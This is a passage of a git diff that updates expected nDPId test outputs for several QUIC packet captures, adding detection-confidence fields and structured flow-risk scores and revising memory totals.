zGwvF91fdMNT2Ud1a7MlSledVlybaZOW\/IT25eYrq8qUp7OLmq33YHB9tcRfpb4rOn2rfYyM5bOl9xpdepuGi\/LiYsHpi9uYuk3aGLpJlSANTGD+wiCLE3MrkCOYxOKA5t4tfQS81KK8jPBDZ4mMSC3oCA1Lz0zLxVZmZCWXnJOfmkKspgYzCDdxLzEnMqSzORisDg3woJEZE5OEx+S1XqZeaj8rAJUfml2Ez+yU\/USi9AFStEEktBVJOejCeRWoAmUoGspy0Nyc0oqEie1GImTVoTEyShF4mSWIHHycpA4BSicElCgQjiJKcAiABJ4cMdARPKaRGACQNncVGCLAqxMECZalpmSmg8WAsVrcQmwYEwGaeNF4gEluYDcshJDJLYRmA00PTe1pAioClk10Chg2yUjE1xANQmAeDloMV+ZX1pSmpSqm5efnJ+fnQlPTFBxNGWpKaWQKhyWQICpJTcdzJGCJ7+czNS8kmJke7iRkyYLSH0TG1Aa2MZpEsGa9LiQkyyWYONC8hYXuGiGmMYBdqdeEjC6kT0ggs35SA0q9gaDDKRiOQZYsGgjFbjy0DKwIDsTyVf67p6O7kbgElUbqQyHKYYGgyGyDlC5jtTI273NV8E2Yd+C1ye2dnFOb2eeVW6ug9bQQS6rsfaMFCEtB2DVhdYd4WBjS2\/kARbTBgaQ"}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1463075953299,"flow_last_seen":1463075954300,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":55535,"flow_avg_l4_payload_len":804,"midstream":0,"ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1463075953299,"flow_last_seen":1463075954300,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":55535,"flow_avg_l4_payload_len":804,"midstream":0,"ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","total-events-serialized":61}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 518/518
@@ -67,9 +67,9 @@
 ~~ total active/idle flows...: 10/10
 ~~ total timeout flows.......: 1
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4620908 bytes
-~~ total memory freed........: 4620908 bytes
-~~ total allocations/frees...: 100106/100106
+~~ total memory allocated....: 4702909 bytes
+~~ total memory freed........: 4702909 bytes
+~~ total allocations/frees...: 101696/101696
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
 ~~ json string max len.......: 2264 chars
diff --git a/test/results/quic046.pcap.out b/test/results/quic046.pcap.out
index 3408a8abf..7670e243e 100644
--- a/test/results/quic046.pcap.out
+++ b/test/results/quic046.pcap.out
@@ -1,10 +1,10 @@
 00439{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic046.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584456191933,"flow_last_seen":1584456191933,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1584456191933,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02236{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1584456191933,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1584456191933,"pkt":"ILABHGh4AJqdnpsZCABFAAViVw9AAIARNVbAqAHs2DrOVsWbAbsFTsB3w1EwNDZQtKT59fQu3TkAAAABmZPTs83+bYJOmUXloAEEAENITE8ZAAAAUEFEAPABAABTTkkA+wEAAFNUSwAxAgAAVkVSADUCAABDQ1MARQIAAE5PTkNlAgAAQUVBRGkCAABVQUlEmAIAAFNDSUSoAgAAVENJRKwCAABQRE1EsAIAAFNNSEy0AgAASUNTTLgCAABOT05Q2AIAAFBVQlP4AgAATUlEU\/wCAABTQ0xTAAMAAEtFWFMEAwAAWExDVAwDAABDU0NUDAMAAENPUFQUAwAAQ0NSVCQDAABJUlRUKAMAAENGQ1csAwAAU0ZDVzADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0taS55dGltZy5jb23iUlTd91Wbyacedc4KWbvYAO9ezSoYOG3jhMeQafLfpHKvILz9Ye+me5P5nrw5Y\/leQsX7MclRMDQ2AeiBYJKSGuh+7YCGohWCkV5w4f4wMDAwMDAwML0xAKSRUT2iY62vYCLSlIfkuoKwQUVTR0Nocm9tZS84MC4wLjM5ODcuMTMyIFdpbmRvd3MgTlQgNi4zOyBXaW42NDsgeDY0mMqP9vF+kzJdLqfvNTDv5wAAAABYNTA5AQAAAB4AAABhJXvQ9+6Hu83ruEOa1Y6Y5fjbWd3ky8\/JdT+d+\/AZZsvZnn1BDAzSykK3Urbw\/IrLoBtlbcpqYoDEomljzhkwZAAAAAEAAABDMjU18ubMxD2HxlI1UlRPQUNLRPLmzMQ9h8ZSYDLLkqBBTd\/6RwAAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00731{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584456191933,"flow_last_seen":1584456191933,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1584456191933,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"Chrome\/80.0.3987.132 Windows NT 6.3; Win64; x64"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584456191933,"flow_last_seen":1584456191933,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1584456191933,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"Chrome\/80.0.3987.132 Windows NT 6.3; Win64; x64"}}
 01147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1584456191934,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":574,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":574,"pkt_l4_len":540,"ts_msec":1584456191934,"pkt":"ILABHGh4AJqdnpsZCABFAAIwVxBAAIAROIfAqAHs2DrOVsWbAbsCHCGo01EwNDZQtKT59fQu3TkAAAAChrDGo43cDq7OAgdbv23GehH0jM01fB5SqCBHGsm4tNDoSAuylkVeyVU1nO51BVLZDdQpzNO9j8lf2o\/kFvxF1keBb1V8bWQbm4GDCTzD9DJbwk6JCzbiEHbQt2\/y4DufAauHa+qhpg6F7I1VBRA5chHzaHSfbKq18eEDQ2D7fby9uiPXDB6cfTGjCACXfFYXGo9zhyaFNtzZv4x3bPv04LGnwloRH845hLIF6d5Y+oKP0inx4RVaOxEjSkSubSvYLun8u1+DAfAvr3DdmGZRAp60H0VhNkgFDR0TK1bvdtwD\/6cndHRtyUINoQIRApDi1wb1MmCAOOvL7steTPHXY5nIkaq4iXTy+WyGwwX1EiuR+wqkWZoB8nUqj3ZqApzNfexl+c7aCawPzdHT3P5zDq7dSyz1wAkXCTveL49FopZWy\/uuB+P5RJbaGpw3CvzBYR4o98uBght36oYbWpopqUw9u0okr+r3kEm4Q75LZzqLS97VgZsNPml00CwyHuDEnhiPWf19O4H99TJdYurnXZ+SQi1Zt2RI1GgBrEOAj7V7V\/6W2VgqcYkPqL1UO6lW\/zp\/K8LZMma1gVsHh4jJ1oXnE7Qjtqi9Um0bkNgFqZBX1s4cYf2FTDL0Lgyu2DOK3ATmX6nv91Qh9\/msYcWCN59XOhhsFRlmXSuc2N2TzOTtWg=="}
 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1584456191934,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"ts_msec":1584456191934,"pkt":"ILABHGh4AJqdnpsZCABFAAByVxFAAIAROkTAqAHs2DrOVsWbAbsAXuOl01EwNDZQtKT59fQu3TkAAAADQ7oFqOGvWa6mhIUAfFpbpAofPEreEA\/GGklYOasxEedYwPIHZE9zXMBgbnX+9bPuSN5MQzRW31QsSe2iJHxiKYqGbP8="}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1584456191933,"flow_last_seen":1584456191986,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":87097,"flow_avg_l4_payload_len":870,"midstream":0,"ts_msec":1584456191986,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"quic046.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1584456191933,"flow_last_seen":1584456191986,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":87097,"flow_avg_l4_payload_len":870,"midstream":0,"ts_msec":1584456191986,"l3_proto":"ip4","src_ip":"192.168.1.236","dst_ip":"216.58.206.86","src_port":50587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"quic046.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 100/100
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597777 bytes
-~~ total memory freed........: 4597777 bytes
-~~ total allocations/frees...: 99654/99654
+~~ total memory allocated....: 4682730 bytes
+~~ total memory freed........: 4682730 bytes
+~~ total allocations/frees...: 101244/101244
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
 ~~ json string max len.......: 2241 chars
diff --git a/test/results/quic_0RTT.pcap.out b/test/results/quic_0RTT.pcap.out
index 70f4eab80..a8efbc3f6 100644
--- a/test/results/quic_0RTT.pcap.out
+++ b/test/results/quic_0RTT.pcap.out
@@ -1,9 +1,9 @@
 00441{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic_0RTT.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603888789791,"flow_last_seen":1603888789791,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603888789791,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02127{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1603888789791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603888789791,"pkt":"AAAAAAAAAAAAAAAAht1gINJtBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAB7CsRWwTYBOvD\/wAAHAhCNdWrrb4+VQiw7LD1RGMN+zL7OkPMAtXpNlW5O0b2\/q+3KdcOtoYFqBIwOi4AbeOZTA9r8spxR89EzuGsSMH\/bUH9ekHEQ922xeaUjW2FgbWmXjMqS+663UY67NIITXpkFxwR22N+eMGvlLVxq1DPyvGiZiTcqCSaCZ0JYqKt+vdrIBp0w3K49QUaWm1DuJd+cQIJzCcz93gKXA+aQn8qJuO+lEHGyiCLVgeWI9\/dk7q4fiSnyVYB8Z\/88\/1PGsSPr7zMnahidPl8sGnTG9MT+px4myWEEHOjoSU0yW9DlNQElkOgitzZjllGvGhUhiBIICMF4QAUv3\/uP2UIoOlO5XivEkb+TEkDY+TeRlQOAIIUbsGZNooxIOe9TQJ82TvA7CrEVTKBa\/0UwEVbDA+egVUviZQiH5ib3Eft7yjRSwrLosJr+JYLE\/b1gPCQqV3\/X9AjXGrd184V\/I069AxL1W3hrfjhc9kTxr61FQb3iBePpHQNPrmWPpWzg65lBvr27yyzoj6wYSTbO781l0YatfDl\/dDvdQIfKr2P6uLMGzJJZkB+Ef6aEehROc00Tde4mLvS3KtN0T7iH4IEsYc3Db9k0scho9GMCBSBIiEPvgGR0Y67dvPV5slktWIWuArg\/VlYjYX5wnaRfV563WjXbTYNGUsYH6yJ12K39PLd+9sxGuDsDv7wuOHQ\/wAAHAhCNdWrrb4+VQiw7LD1RGMN+0KnwyOIE1IPFP+gl6zZC2dnhr2vJbjX4p4gjfOHidbDFdeXHDeCB6AR+v8jJSYiWVKpOKT1tYDZ2eaYAb8EM4juskAwg8WJRDDALjE67avfbFy2bAKFGVwliLbq9g9yfe2DG7zudaoq7VcKjW8DJUYzFu0kG3f0I+eg9KERSSE9tNgraaUChfDY0CfeGXPHIGfNOqV2eildt3CypMlgx434dmv5i8bOFyWursPeR9FPxLAp0E17z39ZowCy9mzMTuEiKSfVFZVEb8A56B9ppGExgQC8QO0Af3vfqS2ttKNvFYUOgdWvnxDVxIQ3xlWS6ELnr9IEyJP7QN13nNZW2yyDnRClGdlAqhKZndvswyZgxdwswpMFr+Hp46L60HP3+Etr\/g+ZQ+dSKaPL8j+qjU4\/5GbDlG+Y8GGpP5yetDzWW4wN5wTi1RfvXLkUi4VB3m4LwQbvS4nockw+p2t9FIJYuLtV0dMHU6Hv7HaVbrS2rEeooj88IkO1U14qUJPxLmg2Uy36iXq2YaI6VfIvwaNOpQxMq6KJ4BIC327gV6F7pkRGqQyr\/fLXQ9\/QAgpjmMNkP95RpEi6vYM4P3hLk7YGQVBnB+IU0NE43CFBWiQCbD6GGRc88ZdV8uxhElyGuoq\/YHF3odV6QEFs9PDd2W40mlJEPTrU\/YbNrDK9EX6uJSY7GfN5JJTDeEvWfQOsQ0uy8IYjlyJ5TxtnQXnq04wVfUtffinNWMR7cNrjwWmw0LkdigoLMel\/dN7JQkDILpNPwSYQ07T0bRnC52xgOJ5umHTPriox2zwHfRI6lLvfBx7j5PR\/iXTtkoj6weekfmGYFZhQNsP1hkCk+6CJfCIo1m1SFLNWhogGJZIJgLWrvdtqIciw9ptTqsx5dUUsMd3KoDy70p2VEA=="}
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603888789791,"flow_last_seen":1603888789791,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603888789791,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"abcd","version":"TLSv1.3","alpn":"h3-32","ja3":"a7b629a5bd67bfc25e2c78b3daa4c12f","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}}
+00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603888789791,"flow_last_seen":1603888789791,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603888789791,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"abcd","version":"TLSv1.3","alpn":"h3-32","ja3":"a7b629a5bd67bfc25e2c78b3daa4c12f","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}}
 02127{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1603888789792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603888789792,"pkt":"AAAAAAAAAAAAAAAAht1gIEmLBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABEVvsKwTYBOuB\/wAAHAiw7LD1RGMN+wgWsFEjN2HZaQBAoeulPe6gJ\/sr\/GIbyJYc14UNgXtYbxk5qiSqETQY4WZpoAlQETVvk0wWYFOpUIdBARl1suh9iNp9EVeqqDCK8cOmjC1x9D6Kfk9hGxfOeT71tvhKd4oN+bdYPjbqVP0GFxeHN3IMs7Zr+fKeQyuFIUWnb5Z155Se3XdA\/gkvhnMx1ULX5WEKCC9gZx60DO5zH6utYTXgxvBd7Ru+OqadPKlFof8AABwIsOyw9URjDfsIFrBRIzdh2WlAxDmD+hjo+e1bU72YwbmAGOLxO5htQDsPNuVs6LSSsGz3SFw0RPm4E415JCnhx8Ge0QKEWADh5iBKGwMueF2ztpwDH7jsWxr3wB6t01oBA1kA7ZvkbHO543VSXW8URQBDqZoClPbnrQAcBZ+H69\/w3iitABvrJy3KVNkC9+NdHjbogcNpY\/5rLpRLS5HK\/H6JgUnP0BdrxIIF6HWRic\/Wf7gn1j0WoelZtuUrK3RpR66wFjn8EMNQiKG+ggDuldLKh\/U6tL0BsOyw9URjDfuFTTkGJh6F+XUUpTe3M82jojmegspYUKam1MxQec2Qkg\/alipH7KpbN4YAt16GjKA0vziYX61TA5r\/+c+B2T\/sfMV9v\/HKdLDeTVTmLVtM6L+LQWLFNxbF4yrEngXf\/VZT2XaqBGXuy2LCG0Ll9PjYDBtAtstKFFXX1\/Aq9PC+CdywR1PopMQdX5Z9pMSyZiyB5Lzg3cVGVQshXQFro5Kf54d6amO7D2XxOTcZnQiaAf\/TGRrLMf2QELrrUW5vGD6IdIKDtOHH0dTjyWhDTPJEfsacf7m9B9Xhce36eKCRqwlUUYp9cEORg9tAs+LNJkhiCPhfdI2kmtp2bekrtpez6Fafq\/eSu5bTHdTjUlYAqlsCVns0h2QvzRkddQkOUP7gAh5QNKxagIYkVNaIjoRzRpVUuqTaY5AYQbzrX47APe8VY1hIf5XFE6TPMKmMe2Q\/0CtWSycEDeCk28gGteNWfkas+cB+UI1rrRtWgkmad7zXpxmJvEVKx1EjCgwWfU89z+KDl6jD4P4IeVlDy+ynTr4HbYfYMZyTtc1RDHu8b7675WQKM\/HIrQq6E8CeXlwrV\/kN4X7y3aDTZ8UUUEk3f6P1Q8uLPJ2Yruxo4hJaXf2cw6q7EdHqcpvwl9wyP0SydRM5I5Xs9cDxcS9AAJl75598Onx7hfnsjzw2+Lk4PiuB9x8RRtBxDIfr1GIv04yL1ivxWfjBmvn9aCE1EDAtVLxBhg2AhlMxK5+fcZuD8gajCU3jBim0JQ1mEhqnrWZNbjfhTXGYll4oRXXUgYKlIV5s1CchSlcMgg5uu0+4Aj3J0p8FsizlxDbb6CHs\/xgqFSxARbNxD3LVLxEd+HIIdIWwvT1MTqPrwh0uOKGI3kFXzTPm+StyKn3RLAeyIgL4EkpQslwgXWxlUtDWXyicGhGk5giCxEYaSUkCR2ecvlHkQpbq28IGeTXJEr9czuuYuc6xx6JNXW8HuS7eYhN\/9rkNRrkW+Ih9+rtXr1O+2Dy7ZXSKTG4Wnmba1vr6ZEKbxvCvQURsWLQQxX5DHxb0xG+It92fZknkVToOutQ6p1RiqEpFpKmIm03EPunCuw=="}
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603888789791,"flow_last_seen":1603888789792,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603888789792,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_0RTT.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603888789791,"flow_last_seen":1603888789792,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603888789792,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":60459,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"quic_0RTT.pcap","alias":"nDPId-test","total-events-serialized":7}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2/2
@@ -13,9 +13,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4599633 bytes
-~~ total memory freed........: 4599633 bytes
-~~ total allocations/frees...: 99567/99567
+~~ total memory allocated....: 4684586 bytes
+~~ total memory freed........: 4684586 bytes
+~~ total allocations/frees...: 101157/101157
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
 ~~ json string max len.......: 2132 chars
diff --git a/test/results/quic_frags_ch_in_multiple_packets.pcapng.out b/test/results/quic_frags_ch_in_multiple_packets.pcapng.out
index 41507377d..b933121d2 100644
--- a/test/results/quic_frags_ch_in_multiple_packets.pcapng.out
+++ b/test/results/quic_frags_ch_in_multiple_packets.pcapng.out
@@ -1,11 +1,11 @@
 00467{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
